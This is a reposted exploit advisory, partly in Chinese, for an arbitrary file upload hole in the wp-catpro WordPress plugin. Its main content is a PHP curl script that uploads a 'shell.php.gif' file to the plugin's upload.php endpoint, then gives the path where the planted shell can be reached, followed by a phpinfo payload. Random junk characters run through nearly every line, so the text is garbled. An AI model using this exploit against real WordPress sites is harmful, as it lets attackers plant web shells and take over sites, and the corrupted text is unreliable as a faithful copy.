Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
$ h& L& ]6 d0 B) K. a, i t#-----------------------------------------------------------------------8 [$ `8 V# }" p% B/ A( B
. S1 Q9 v! g% L* z$ R; ]% K* |) u
作者 => Zikou-16
8 t' X0 \) Q# X1 Q+ v邮箱 => zikou16x@gmail.com
) r A2 q( a T7 R7 O2 U: ?测试系统 : Windows 7 , Backtrack 5r3
, X) }: x4 n0 E+ j. s' [* r4 ?4 i) B下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
0 U R4 U }' d4 P####$ S/ Z* z M) h. H9 u' `9 m
! `# A/ u# \% X/ a
#=> Exploit 信息:
5 k: z( H& k' x: P& \/ a------------------
) E* D u8 z- ?$ d! j# 攻击者可以上传 file/shell.php.gif
: C0 S, C# b8 m2 d# Z7 V% ]% ?! z# ("jpg", "gif", "png") // Allowed file extensions
% ^2 A3 @6 o9 p. |0 ]# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment); C5 q4 Y7 s' ~5 @6 W
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
- c4 l9 W2 F) H0 i; `------------------. p1 ^. @8 W9 Z
* h. f! C6 W4 r' l2 w2 p/ ?8 q% a8 K2 R
#=> Exploit
/ U/ }; _" d: G& ^8 f, ~-----------& [6 b) b9 ^2 z! k4 e
<?php7 M4 V \3 F1 l
; P' j' @- L! D& R9 J9 j$uploadfile="zik.php.gif";
. @& |# I1 C& n3 S1 v$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");& `3 f- D& w; W. w
curl_setopt($ch, CURLOPT_POST, true); C- K2 z" S6 b/ p. J
curl_setopt($ch, CURLOPT_POSTFIELDS,
9 R; m' \8 E( V7 u- Warray('Filedata'=>"@$uploadfile",! ] ~& V" h7 f7 p% r
'folder'=>'/wp-content/uploads/catpro/'));
$ D. M8 \. k# R5 d& s4 |curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
, R( s- u- _1 ?% ]( I' V$postResult = curl_exec($ch);" Z$ [% t8 n/ R
curl_close($ch);* D. G' Y' f: j3 V& I
: |! w3 W1 v! F) q8 u( O+ ~print "$postResult";: o4 u+ J/ K- J3 _1 V
4 L! v5 N+ y9 ]8 u
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif& ^1 b9 R F9 b5 `# i
?>) f( a2 X7 b) k' p# G2 T: ]
<?php
3 g& `7 @6 q( p F- @- Q. A" Sphpinfo(); T% Y6 I+ S' K* ` M8 l
?> |